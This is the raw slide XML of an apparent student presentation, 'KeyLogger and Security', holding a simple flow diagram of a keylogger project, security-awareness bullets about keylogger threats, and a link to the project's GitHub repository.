              <a:rPr b="1" lang="en-US" sz="4800" spc="-15" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800" spc="-35" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800" spc="-32" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>LL</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800" spc="-7" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800" spc="29" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800" spc="4" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582120" y="4295880"/>
            <a:ext cx="1056960" cy="1066320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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228" name="TextBox 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548280" y="4648320"/>
            <a:ext cx="15087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lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Keylogger</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1743120" y="2971800"/>
            <a:ext cx="1228320" cy="369000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00b050"/>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230" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362320" y="5486400"/>
            <a:ext cx="1371240" cy="299880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ff0000"/>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231" name="TextBox 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981080" y="2983320"/>
            <a:ext cx="91404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lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Start</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="TextBox 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2642760" y="5447520"/>
            <a:ext cx="96048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lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Stop</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010280" y="3352680"/>
            <a:ext cx="1828440" cy="2433600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="10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234" name="Isosceles Triangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="1828800"/>
            <a:ext cx="755640" cy="609120"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>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235" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4327920" y="1066680"/>
            <a:ext cx="1691640" cy="914040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4f81bd"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="eeece1">
                <a:lumMod val="10000"/>
              </a:srgbClr>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236" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6960240" y="3953880"/>
            <a:ext cx="19810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IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Keylogs(text File)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4327920" y="2590920"/>
            <a:ext cx="1615320" cy="380520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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238" name="TextBox 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495680" y="2571480"/>
            <a:ext cx="169164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lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Keyboard</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="239" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1302840" y="3340800"/>
            <a:ext cx="678600" cy="982440"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="240" name="Straight Arrow Connector 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2971800" y="2801880"/>
            <a:ext cx="1295640" cy="170280"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="3832200"/>
            <a:ext cx="1447560" cy="981720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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242" name="TextBox 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962520" y="4074840"/>
            <a:ext cx="1294920" cy="912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lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Background Process</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="243" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4724280" y="2983320"/>
            <a:ext cx="76680" cy="848880"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="244" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5388120" y="4138200"/>
            <a:ext cx="1622520" cy="259920"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="245" name="Straight Arrow Connector 38"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5016960" y="3028320"/>
            <a:ext cx="112680" cy="792360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="246" name="Straight Arrow Connector 43"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="230" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1639080" y="5257800"/>
            <a:ext cx="723600" cy="378720"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="ff0000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="247" name="Straight Arrow Connector 45"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3733560" y="4867920"/>
            <a:ext cx="384480" cy="588600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="ff0000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="248" name="Straight Arrow Connector 47"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="4853160"/>
            <a:ext cx="314640" cy="933840"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="ff0000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="Rectangle 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="5786640"/>
            <a:ext cx="1752120" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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250" name="TextBox 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5235840" y="5860440"/>
            <a:ext cx="154548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lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>End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object 2"/>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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252"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53"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54"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55" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755280" y="385560"/>
            <a:ext cx="2436840" cy="1476720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="13320" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12600" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800" spc="-41" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800" spc="12" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800" spc="-32" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800" spc="-406" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>TS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11277360" y="6473160"/>
            <a:ext cx="228240" cy="19692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C61C8CA8-DAFB-49D9-9B83-D15BF93D905C}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2d936b"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="752400" y="1695600"/>
            <a:ext cx="5343120" cy="310716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000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Keyloggers are threat to users which breaches information to attackers and understanding its nature for purposes crucial to secure our information further.</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Identifying keyloggers manually is harder until an user fully aware of their system (files, softwares, running processes).</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To enhance security to any user they must know methodologies of keyloggers for securing sensitive information before exploited by attacker.</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object 2"/>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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259"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60"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61"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62" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755280" y="385560"/>
            <a:ext cx="4121280" cy="1158480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="13320" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12600" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Github Repo</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11277360" y="6473160"/>
            <a:ext cx="228240" cy="19692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86B0067D-305E-47B5-8C0F-E43A73C8F9A8}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2d936b"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676520" y="2895480"/>
            <a:ext cx="6324120" cy="675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u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://github.com/MaheshKumar1533/KeyLogger.git</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94"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nvGrpSpPr>
          <p:cNvPr id="95" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7448760" y="0"/>
            <a:ext cx="4743360" cy="6858360"/>
            <a:chOff x="7448760" y="0"/>
            <a:chExt cx="4743360" cy="6858360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="96"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7"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8"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9"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0"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1"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2"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3"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4"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sp>
        <p:nvSpPr>
          <p:cNvPr id="105"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6" name="object 14"/>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7" name="object 15"/>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8"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9" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603360" y="3093480"/>
            <a:ext cx="8733600" cy="1845720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="16560" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12600" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="6000" spc="4" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>KeyLogger and Security</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="110" name="object 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="466560" y="6410160"/>
            <a:ext cx="3704760" cy="294840"/>
            <a:chOff x="466560" y="6410160"/>
            <a:chExt cx="3704760" cy="294840"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="111" name="object 19" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="676440" y="6467400"/>
              <a:ext cx="2142720" cy="199800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="112" name="object 20" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="466560" y="6410160"/>
              <a:ext cx="3704760" cy="294840"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="object 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739800" y="6473160"/>
            <a:ext cx="179856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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="17"/>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E510A187-A033-4392-9C3D-F5257A19BA25}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9"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15" name="TextBox 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="533520"/>
            <a:ext cx="5486040" cy="8211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4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>PROJECT TITLE</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-U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16"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nvGrpSpPr>
          <p:cNvPr id="117" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7448760" y="0"/>
            <a:ext cx="4743360" cy="6858360"/>
            <a:chOff x="7448760" y="0"/>
            <a:chExt cx="4743360" cy="6858360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="118"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19"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0"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1"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2"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3"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4"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5"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6"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sp>
        <p:nvSpPr>
          <p:cNvPr id="127"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8" name="object 14"/>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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129"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0"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31" name="object 17" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10686960" y="6134040"/>
            <a:ext cx="247320" cy="247320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="132" name="object 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="47520" y="3819600"/>
            <a:ext cx="4123800" cy="3009600"/>
            <a:chOff x="47520" y="3819600"/>
            <a:chExt cx="4123800" cy="3009600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="133" name="object 19" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="466560" y="6410160"/>
              <a:ext cx="3704760" cy="294840"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="0">
